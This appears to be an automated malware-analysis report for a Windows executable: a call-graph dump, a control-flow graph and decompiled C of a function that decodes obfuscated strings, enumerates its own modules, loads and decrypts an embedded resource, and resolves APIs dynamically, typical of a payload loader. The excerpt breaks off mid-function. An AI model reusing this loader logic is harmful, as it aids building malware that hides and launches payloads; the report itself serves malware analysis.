LeaveCriticalSection 14967->14970 14969 40d2bc 14969->14881 14970->14969 14974 40b9aa ___lock_fhandle _strnlen 14971->14974 14972 40b9b8 14973 40bfc1 ___strgtold12_l 63 API calls 14972->14973 14975 40b9bd 14973->14975 14974->14972 14977 40b9ec 14974->14977 14976 40e744 ___strgtold12_l 6 API calls 14975->14976 14983 40b9cd ___lock_fhandle 14976->14983 14978 40d6e0 __lock 63 API calls 14977->14978 14979 40b9f3 14978->14979 15028 40b917 14979->15028 14983->14011 14985 4017cc _realloc 14984->14985 14985->14016 14988 40af70 14986->14988 14987 40b84d _malloc 63 API calls 14987->14988 14988->14987 14989 40af8a 14988->14989 14990 40d2e3 _malloc 6 API calls 14988->14990 14993 40af8c std::bad_alloc::bad_alloc 14988->14993 14989->14021 14990->14988 14991 40afb2 15242 40af49 14991->15242 14993->14991 14995 40d2bd __cinit 74 API calls 14993->14995 14995->14991 14997 40afca 14999 401903 lstrlenA 14998->14999 15000 4018fc 14998->15000 15254 4017e0 14999->15254 15000->14043 15003 401940 GetLastError 15005 40194b MultiByteToWideChar 15003->15005 15006 40198d 15003->15006 15004 401996 15004->14043 15007 4017e0 73 API calls 15005->15007 15006->15004 15262 401030 GetLastError 15006->15262 15009 401970 MultiByteToWideChar 15007->15009 15009->15006 15011 40af66 75 API calls 15010->15011 15012 40187c 15011->15012 15013 401885 SysAllocString 15012->15013 15014 4018a4 15012->15014 15013->15014 15014->14045 15016 40231a SafeArrayUnaccessData 15015->15016 15016->14052 15018 4019aa InterlockedDecrement 15017->15018 15023 4019df VariantClear 15017->15023 15019 4019b8 15018->15019 15018->15023 15020 4019c2 SysFreeString 15019->15020 15021 4019c9 15019->15021 15019->15023 15020->15021 15271 40aec0 15021->15271 15023->14059 15025 401571 15024->15025 15027 401582 15024->15027 15277 40afe0 15025->15277 15027->14023 15027->15027 15029 40b930 15028->15029 15030 40b92c 15028->15030 15029->15030 15032 40b942 _strlen 15029->15032 15037 40eeab 15029->15037 15034 40ba18 15030->15034 15032->15030 15047 40edfb 15032->15047 15241 40d606 LeaveCriticalSection 15034->15241 15036 40ba1f 15036->14983 15039 40ef2b 15037->15039 15045 40eec6 15037->15045 15038 40eecc WideCharToMultiByte 15038->15039 15038->15045 15039->15032 15040 411cba __calloc_crt 63 API calls 15040->15045 15041 40eeef WideCharToMultiByte 15042 40ef37 15041->15042 15041->15045 15043 40b6b5 __crtGetStringTypeA_stat 63 API calls 15042->15043 15043->15039 15045->15038 15045->15039 15045->15040 15045->15041 15046 40b6b5 __crtGetStringTypeA_stat 63 API calls 15045->15046 15050 414d44 15045->15050 15046->15045 15142 40ed0d 15047->15142 15051 414d76 15050->15051 15052 414d59 15050->15052 15053 414dd4 15051->15053 15096 417e7e 15051->15096 15054 40bfc1 ___strgtold12_l 63 API calls 15052->15054 15057 40bfc1 ___strgtold12_l 63 API calls 15053->15057 15056 414d5e 15054->15056 15059 40e744 ___strgtold12_l 6 API calls 15056->15059 15058 414d6e 15057->15058 15058->15045 15059->15058 15061 414db5 15063 414de7 15061->15063 15064 414e12 15061->15064 15065 414dcb 15061->15065 15063->15058 15068 411c75 __malloc_crt 63 API calls 15063->15068 15064->15058 15107 414c98 15064->15107 15069 40eeab ___wtomb_environ 120 API calls 15065->15069 15071 414df7 15068->15071 15072 414dd0 15069->15072 15070 414e8f 15074 414f7a 15070->15074 15077 414e98 15070->15077 15071->15058 15071->15064 15078 411c75 __malloc_crt 63 API calls 15071->15078 15072->15053 15072->15064 15073 414e41 15076 40b6b5 __crtGetStringTypeA_stat 63 API calls 15073->15076 15075 40b6b5 __crtGetStringTypeA_stat 63 API calls 15074->15075 15075->15058 15081 414e4b 15076->15081 15077->15058 15079 411d54 __recalloc_crt 74 API calls 15077->15079 15078->15064 15082 414e51 _strlen 15079->15082 15080 414f5e 15080->15058 15084 40b6b5 __crtGetStringTypeA_stat 63 API calls 15080->15084 15081->15082 15111 411d54 15081->15111 15082->15058 15082->15080 15085 411cba __calloc_crt 63 API calls 15082->15085 15084->15058 15086 414efb _strlen 15085->15086 15086->15080 15087 40ef42 _strcpy_s 63 API calls 15086->15087 15088 414f14 15087->15088 15089 414f28 SetEnvironmentVariableA 15088->15089 15090 40e61c __invoke_watson 10 API calls 15088->15090 15091 414f49 15089->15091 15092 414f52 15089->15092 15093 414f25 15090->15093 15094 40bfc1 ___strgtold12_l 63 API calls 15091->15094 15095 40b6b5 __crtGetStringTypeA_stat 63 API calls 15092->15095 15093->15089 15094->15092 15095->15080 15116 417dc2 15096->15116 15098 414d89 15098->15053 15098->15061 15099 414cea 15098->15099 15100 414d3b 15099->15100 15101 414cfb 15099->15101 15100->15061 15102 411cba __calloc_crt 63 API calls 15101->15102 15103 414d12 15102->15103 15104 40e79a __amsg_exit 63 API calls 15103->15104 15106 414d24 15103->15106 15104->15106 15106->15100 15123 417d6d 15106->15123 15108 414ca6 15107->15108 15109 40edfb __fassign 107 API calls 15108->15109 15110 414ccd 15108->15110 15109->15108 15110->15070 15110->15073 15113 411d5d 15111->15113 15114 411da0 15113->15114 15115 411d81 Sleep 15113->15115 15131 40b783 15113->15131 15114->15082 15115->15113 15117 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15116->15117 15118 417dd6 15117->15118 15119 417df4 __mbschr_l 15118->15119 15120 40bfc1 ___strgtold12_l 63 API calls 15118->15120 15119->15098 15121 417de4 15120->15121 15122 40e744 ___strgtold12_l 6 API calls 15121->15122 15122->15119 15124 417d7e _strlen 15123->15124 15130 417d7a 15123->15130 15125 40b84d _malloc 63 API calls 15124->15125 15126 417d91 15125->15126 15127 40ef42 _strcpy_s 63 API calls 15126->15127 15126->15130 15128 417da3 15127->15128 15129 40e61c __invoke_watson 10 API calls 15128->15129 15128->15130 15129->15130 15130->15106 15132 40b792 15131->15132 15133 40b7ba 15131->15133 15132->15133 15135 40b79e 15132->15135 15134 40b7cf 15133->15134 15136 40e56a __msize 64 API calls 15133->15136 15137 40e34f _realloc 72 API calls 15134->15137 15138 40bfc1 ___strgtold12_l 63 API calls 15135->15138 15136->15134 15141 40b7b3 _memset 15137->15141 15139 40b7a3 15138->15139 15140 40e744 ___strgtold12_l 6 API calls 15139->15140 15140->15141 15141->15113 15143 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15142->15143 15144 40ed21 15143->15144 15145 40ed42 15144->15145 15147 40ed75 15144->15147 15158 40ed2a 15144->15158 15146 40bfc1 ___strgtold12_l 63 API calls 15145->15146 15148 40ed47 15146->15148 15149 40ed99 15147->15149 15150 40ed7f 15147->15150 15151 40e744 ___strgtold12_l 6 API calls 15148->15151 15153 40eda1 15149->15153 15154 40edb5 15149->15154 15152 40bfc1 ___strgtold12_l 63 API calls 15150->15152 15151->15158 15157 40ed84 15152->15157 15160 414b9e 15153->15160 15180 414b5c 15154->15180 15159 40e744 ___strgtold12_l 6 API calls 15157->15159 15158->15032 15159->15158 15161 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15160->15161 15162 414bb2 15161->15162 15163 414bd3 15162->15163 15165 414c06 15162->15165 15175 414bbb 15162->15175 15164 40bfc1 ___strgtold12_l 63 API calls 15163->15164 15166 414bd8 15164->15166 15167 414c10 15165->15167 15168 414c2a 15165->15168 15171 40e744 ___strgtold12_l 6 API calls 15166->15171 15172 40bfc1 ___strgtold12_l 63 API calls 15167->15172 15169 414c34 15168->15169 15170 414c49 15168->15170 15185 417c1d 15169->15185 15174 414b5c ___crtCompareStringA 96 API calls 15170->15174 15171->15175 15176 414c15 15172->15176 15178 414c63 15174->15178 15175->15158 15177 40e744 ___strgtold12_l 6 API calls 15176->15177 15177->15175 15178->15175 15179 40bfc1 ___strgtold12_l 63 API calls 15178->15179 15179->15175 15181 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15180->15181 15182 414b6f 15181->15182 15201 4147ec 15182->15201 15186 417c33 15185->15186 15198 417c58 ___ascii_strnicmp 15185->15198 15187 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15186->15187 15188 417c3e 15187->15188 15189 417c43 15188->15189 15190 417c78 15188->15190 15191 40bfc1 ___strgtold12_l 63 API calls 15189->15191 15192 417c82 15190->15192 15200 417caa 15190->15200 15193 417c48 15191->15193 15194 40bfc1 ___strgtold12_l 63 API calls 15192->15194 15195 40e744 ___strgtold12_l 6 API calls 15193->15195 15197 417c87 15194->15197 15195->15198 15196 4168fc 98 API calls __tolower_l 15196->15200 15199 40e744 ___strgtold12_l 6 API calls 15197->15199 15198->15175 15199->15198 15200->15196 15200->15198 15202 414818 CompareStringW 15201->15202 15204 41482f strncnt 15201->15204 15203 41483b GetLastError 15202->15203 15202->15204 15203->15204 15206 414a95 15204->15206 15210 4148a4 15204->15210 15226 414881 15204->15226 15205 40ce09 ___strgtold12_l 5 API calls 15207 414b5a 15205->15207 15208 417a20 ___ansicp 87 API calls 15206->15208 15207->15158 15209 414abb 15208->15209 15212 414b1c CompareStringA 15209->15212 15215 417a69 ___convertcp 70 API calls 15209->15215 15209->15226 15211 414962 MultiByteToWideChar 15210->15211 15214 4148e6 GetCPInfo 15210->15214 15210->15226 15221 414982 15211->15221 15211->15226 15213 414b3a 15212->15213 15212->15226 15216 40b6b5 __crtGetStringTypeA_stat 63 API calls 15213->15216 15217 4148f7 15214->15217 15214->15226 15218 414ae0 15215->15218 15219 414b40 15216->15219 15217->15211 15217->15226 15224 417a69 ___convertcp 70 API calls 15218->15224 15218->15226 15222 40b6b5 __crtGetStringTypeA_stat 63 API calls 15219->15222 15220 4149d9 MultiByteToWideChar 15223 4149f2 MultiByteToWideChar 15220->15223 15239 414a83 15220->15239 15225 40b84d _malloc 63 API calls 15221->15225 15230 41499f __crtGetStringTypeA_stat 15221->15230 15222->15226 15227 414a09 15223->15227 15223->15239 15228 414b01 15224->15228 15225->15230 15226->15205 15235 40b84d _malloc 63 API calls 15227->15235 15240 414a1f __crtGetStringTypeA_stat 15227->15240 15231 414b16 15228->15231 15232 414b0a 15228->15232 15229 4147ae __freea 63 API calls 15229->15226 15230->15220 15230->15226 15231->15212 15233 40b6b5 __crtGetStringTypeA_stat 63 API calls 15232->15233 15233->15226 15234 414a53 MultiByteToWideChar 15236 414a66 CompareStringW 15234->15236 15237 414a7d 15234->15237 15235->15240 15236->15237 15238 4147ae __freea 63 API calls 15237->15238 15238->15239 15239->15229 15240->15234 15240->15239 15241->15036 15248 40d0f5 15242->15248 15245 40cd39 15246 40cd62 15245->15246 15247 40cd6e RaiseException 15245->15247 15246->15247 15247->14997 15249 40af59 15248->15249 15250 40d115 _strlen 15248->15250 15249->15245 15250->15249 15251 40b84d _malloc 63 API calls 15250->15251 15252 40d128 15251->15252 15252->15249 15253 40ef42 _strcpy_s 63 API calls 15252->15253 15253->15249 15255 4017e9 15254->15255 15258 40b783 __recalloc 73 API calls 15255->15258 15259 40182d 15255->15259 15261 401844 15255->15261 15256 40b6b5 __crtGetStringTypeA_stat 63 API calls 15256->15261 15258->15259 15259->15256 15259->15261 15260 40186d MultiByteToWideChar 15260->15003 15260->15004 15261->15260 15264 40b743 15261->15264 15263 401044 15262->15263 15265 40e231 __calloc_impl 63 API calls 15264->15265 15266 40b75d 15265->15266 15267 40b779 15266->15267 15268 40bfc1 ___strgtold12_l 63 API calls 15266->15268 15267->15261 15269 40b770 15268->15269 15269->15267 15270 40bfc1 ___strgtold12_l 63 API calls 15269->15270 15270->15267 15272 40b6b5 ___lock_fhandle 15271->15272 15273 40b73d ___lock_fhandle 15272->15273 15274 40b714 HeapFree 15272->15274 15273->15023 15274->15273 15275 40b727 15274->15275 15276 40bfc1 ___strgtold12_l 63 API calls 15275->15276 15276->15273 15278 40aff8 15277->15278 15279 40b01f __VEC_memcpy 15278->15279 15280 40b027 15278->15280 15279->15280 15280->15027 15282 40e8ea ___lock_fhandle 15281->15282 15283 40d6e0 __lock 63 API calls 15282->15283 15284 40e8f1 15283->15284 15285 40e9ba __initterm 15284->15285 15286 40e91d 15284->15286 15300 40e9f5 15285->15300 15288 4104e9 __decode_pointer 6 API calls 15286->15288 15290 40e928 15288->15290 15291 40e9aa __initterm 15290->15291 15294 4104e9 __decode_pointer 6 API calls 15290->15294 15291->15285 15293 40e9f2 ___lock_fhandle 15293->14064 15298 40e93d 15294->15298 15295 40e9e9 15296 40e7ee _malloc 4 API calls 15295->15296 15296->15293 15297 4104e0 6 API calls ___crtMessageBoxW 15297->15298 15298->15291 15298->15297 15299 4104e9 6 API calls __decode_pointer 15298->15299 15299->15298 15301 40e9d6 15300->15301 15302 40e9fb 15300->15302 15301->15293 15304 40d606 LeaveCriticalSection 15301->15304 15305 40d606 LeaveCriticalSection 15302->15305 15304->15295 15305->15301

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 22 401cb0-401cce call 401650 18->22 23 401c9c-401caf CloseHandle 18->23 20->16 25 401c85-401c8d 20->25 21->18 33 401cd0-401cd4 22->33 25->14 25->21 29 401ef3-401f1a call 401300 SizeofResource 27->29 28->29 38 401f1c-401f2f 29->38 39 401f5f-401f69 29->39 36 401cf0-401cf2 33->36 37 401cd6-401cd8 33->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->33 46->41 47->7 51 401d0f 47->51 49->5 87 4021aa-4021c0 49->87 50->49 52 401d10-401d2e call 401650 51->52 61 401d30-401d34 52->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->23 71 401d5d-401d7b call 401650 68->71 70->61 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 86 401dad-401dbd Module32Next 81->86 83->79 85 401d92-401d9a 83->85 84->81 85->77 85->84 86->7 86->52 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 94 402482-402487 92->94 98 40221d-40223d 93->98 99 40244f-40245f 93->99 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 8ed01d 122->154 155 40234e call 8ed006 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 8ed01d 135->152 153 402390 call 8ed006 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 141 4023b6-4023b8 140->141 142 4023ba 140->142 144 4023bc-402417 VariantClear * 2 call 4019a0 141->144 142->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                        C-Code - Quality: 77%
                                                                        			E004019F0(void* __edx, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t337;
                                                                        				void* _t340;
                                                                        				int _t341;
                                                                        				CHAR* _t344;
                                                                        				intOrPtr* _t349;
                                                                        				int _t350;
                                                                        				long _t352;
                                                                        				signed int _t354;
                                                                        				intOrPtr _t358;
                                                                        				long _t359;
                                                                        				CHAR* _t364;
                                                                        				struct HINSTANCE__* _t365;
                                                                        				CHAR* _t366;
                                                                        				_Unknown_base(*)()* _t367;
                                                                        				int _t368;
                                                                        				int _t369;
                                                                        				int _t370;
                                                                        				intOrPtr* _t376;
                                                                        				int _t378;
                                                                        				intOrPtr _t379;
                                                                        				intOrPtr* _t381;
                                                                        				int _t383;
                                                                        				intOrPtr* _t384;
                                                                        				int _t385;
                                                                        				int _t396;
                                                                        				int _t399;
                                                                        				int _t402;
                                                                        				int _t405;
                                                                        				intOrPtr* _t407;
                                                                        				int _t413;
                                                                        				int _t415;
                                                                        				void* _t421;
                                                                        				int _t422;
                                                                        				int _t424;
                                                                        				intOrPtr* _t428;
                                                                        				intOrPtr _t429;
                                                                        				intOrPtr* _t431;
                                                                        				int _t432;
                                                                        				int _t435;
                                                                        				intOrPtr* _t437;
                                                                        				int _t438;
                                                                        				intOrPtr* _t439;
                                                                        				int _t440;
                                                                        				int _t442;
                                                                        				signed int _t448;
                                                                        				signed int _t451;
                                                                        				signed int _t452;
                                                                        				int _t469;
                                                                        				int _t471;
                                                                        				int _t482;
                                                                        				signed int _t486;
                                                                        				intOrPtr* _t488;
                                                                        				intOrPtr* _t490;
                                                                        				intOrPtr* _t492;
                                                                        				intOrPtr _t493;
                                                                        				void* _t494;
                                                                        				struct HRSRC__* _t497;
                                                                        				void* _t514;
                                                                        				int _t519;
                                                                        				intOrPtr* _t520;
                                                                        				void* _t524;
                                                                        				void* _t525;
                                                                        				struct HINSTANCE__* _t526;
                                                                        				intOrPtr _t527;
                                                                        				void* _t531;
                                                                        				void* _t535;
                                                                        				struct HRSRC__* _t536;
                                                                        				intOrPtr* _t537;
                                                                        				intOrPtr* _t539;
                                                                        				int _t542;
                                                                        				int _t543;
                                                                        				intOrPtr* _t547;
                                                                        				intOrPtr* _t548;
                                                                        				intOrPtr* _t549;
                                                                        				intOrPtr* _t550;
                                                                        				void* _t551;
                                                                        				intOrPtr _t552;
                                                                        				int _t555;
                                                                        				void* _t556;
                                                                        				void* _t557;
                                                                        				void* _t558;
                                                                        				void* _t559;
                                                                        				void* _t560;
                                                                        				void* _t561;
                                                                        				void* _t562;
                                                                        				intOrPtr* _t563;
                                                                        				void* _t564;
                                                                        				void* _t565;
                                                                        				void* _t566;
                                                                        				void* _t567;
                                                                        
                                                                        				_t567 = __eflags;
                                                                        				_t494 = __edx;
                                                                        				__imp__OleInitialize(0); // executed
                                                                        				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                        				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                        				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                        				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                        				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                        				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                        				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                        				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                        				 *((char*)(_t556 + 0x23)) = 6;
                                                                        				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                        				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                        				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                        				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                        				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                        				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                        				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                        				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                        				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                        				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                        				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                        				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                        				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                        				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                        				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                        				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                        				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                        				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                        				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                        				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                        				 *((char*)(_t556 + 0x38)) = 0;
                                                                        				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                        				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                        				_t557 = _t556 + 0xc;
                                                                        				if(_t337 == 0x41b2a0) {
                                                                        					L80:
                                                                        					__eflags = 0;
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                        					_t525 = _t340;
                                                                        					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                        					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                        					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                        					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                        					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                        					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                        					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                        					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                        					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                        					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                        					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                        					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                        					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                        					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                        					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                        					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                        					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                        					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                        					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                        					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                        					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                        					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                        					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                        					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                        					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                        					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                        					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                        					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                        					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                        					 *((char*)(_t557 + 0x84)) = 0;
                                                                        					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                        					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                        					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                        					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                        					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                        					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                        					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                        					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                        					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                        					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                        					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                        					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                        					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                        					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                        					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                        					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                        					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                        					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                        					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                        					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                        					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                        					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                        					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                        					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                        					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                        					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                        					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                        					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                        					 *((char*)(_t557 + 0x38)) = 0;
                                                                        					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                        					if(_t341 == 0) {
                                                                        						L38:
                                                                        						CloseHandle(_t525);
                                                                        						_t526 = GetModuleHandleA(0);
                                                                        						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                        						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                        						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                        						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                        						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                        						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                        						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                        						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                        						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                        						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                        						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                        						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                        						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                        						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                        						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                        						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                        						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                        						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                        						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                        						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                        						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                        						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                        						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                        						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                        						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                        						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                        						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                        						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                        						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                        						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                        						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                        						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                        						 *((char*)(_t557 + 0x3c)) = 0;
                                                                        						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                        						_t558 = _t557 + 8;
                                                                        						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                        						 *(_t558 + 0x50) = _t536;
                                                                        						_t551 = LoadResource(_t526, _t536);
                                                                        						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                        						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                        						_push(0x40022);
                                                                        						_t537 = _t349; // executed
                                                                        						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                        						_t559 = _t558 + 8;
                                                                        						 *(_t559 + 0x34) = _t350;
                                                                        						__eflags = _t350;
                                                                        						if(_t350 == 0) {
                                                                        							 *(_t559 + 0x50) = 0;
                                                                        						} else {
                                                                        							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                        							_t486 =  *(_t559 + 0x40);
                                                                        							_t559 = _t559 + 0xc;
                                                                        							 *(_t559 + 0x50) = _t486;
                                                                        						}
                                                                        						E00401300( *(_t559 + 0x50));
                                                                        						_t497 =  *(_t559 + 0x48);
                                                                        						_t352 = SizeofResource(_t526, _t497);
                                                                        						 *(_t559 + 0x40) = _t352;
                                                                        						asm("cdq");
